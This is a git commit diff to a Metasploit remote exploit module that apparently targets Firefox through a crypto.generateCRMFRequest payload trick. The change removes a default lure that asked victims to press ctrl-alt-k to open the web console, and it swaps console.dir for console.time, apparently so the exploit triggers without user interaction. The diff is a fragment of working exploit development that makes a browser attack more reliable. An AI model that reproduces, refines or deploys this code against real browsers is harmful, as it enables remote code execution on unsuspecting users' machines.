No need for web console YESSSS
parent
738a295f0a
commit
694d917acc
|
@ -56,12 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptString.new('CONTENT', [
|
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
|
||||||
true,
|
|
||||||
"Content to display inside the HTML <body>.",
|
|
||||||
"An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i))"+
|
|
||||||
" ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
|
|
||||||
])
|
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -87,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
|
crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
|
||||||
return 5;
|
return 5;
|
||||||
};
|
};
|
||||||
console.dir(y);
|
console.time(y);
|
||||||
</script>
|
</script>
|
||||||
#{datastore['CONTENT']}
|
#{datastore['CONTENT']}
|
||||||
</body>
|
</body>
|
||||||
|
|
Loading…
Reference in New Issue